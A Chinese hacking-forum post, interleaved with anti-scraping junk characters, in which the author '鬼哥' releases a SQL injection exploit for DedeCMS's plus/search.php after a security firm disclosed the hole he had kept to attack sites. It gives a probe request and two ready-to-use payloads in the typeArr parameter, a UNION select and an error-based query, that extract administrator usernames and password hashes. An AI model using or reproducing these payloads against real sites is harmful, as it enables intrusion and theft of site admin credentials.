转载不加作者名的没JJ& q! @! p! L/ E* d6 ~$ O! p
' h* f7 t. s) H$ j6 K7 t+ ~0 H
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。 Q$ Q5 W+ h& j
, {0 R: [+ q v' K
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。; k" z6 z0 E& T3 ^# X7 O/ P
) b% d( A# I5 G" G: i0 z$ b我一般是这样测试的:
5 d( P0 p* f0 L. ~( t# Z1 Y$ h. k9 E* d1 f* n+ i( b) h3 T
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a* L6 z; W% ]' K4 K4 o
* j0 x) X0 z9 t, r7 Z- z( `
转载不加作者名的没JJ* W- h5 b0 ]- W8 Y
# p. c9 O/ N& G3 J7 Y作者:鬼哥! |6 S8 }/ |8 P. D
: B/ H9 g! A% J5 C7 H
( ?; O: Z4 e4 Y" \% f$ J: D
2 }9 O( Y" ]+ ]
看结果如果提示
! J c7 j7 B+ v9 w$ x2 ^
. ~' r5 T) m4 d4 c8 V; `Safe Alert: Request Error step 2 !, m& n. H. {) A* q* u2 Y6 P
/ | F& G4 {, b5 L3 x
那么直接用下面的exp
8 j3 L9 l8 v3 O$ y5 W5 u3 ~6 n6 g0 t% u' _+ r; f
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
) L" D* ^& b8 H; M$ S; _/ |$ x
+ V5 x+ u. N8 f2 G7 p
5 x+ x: X! e8 {# m J看结果如果提示9 ?: X+ J# V5 U$ X- W$ x9 O' x3 B
; Y' n# |8 W7 b( g* ~
Safe Alert: Request Error step 1 !
+ R" l; x3 {% ?9 C" x( s+ i) c9 e/ M8 s( i) Q
那么直接用下面的exp
X- U4 H& Y" n1 D& |2 r$ E- Z2 l+ k n# u$ c3 }1 u
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
* u: R+ ~! {+ J2 a1 x. o. [5 K. \* E" q+ ^1 U' S6 U3 T( y
/ Z* A! _! ]3 p( p D* v" C z. {1 h h
如果正常显示证明漏洞不存在了。
! ^, s- F/ y# i: r r0 O
( \$ H; N" W/ L+ v转载不加作者名的没JJ |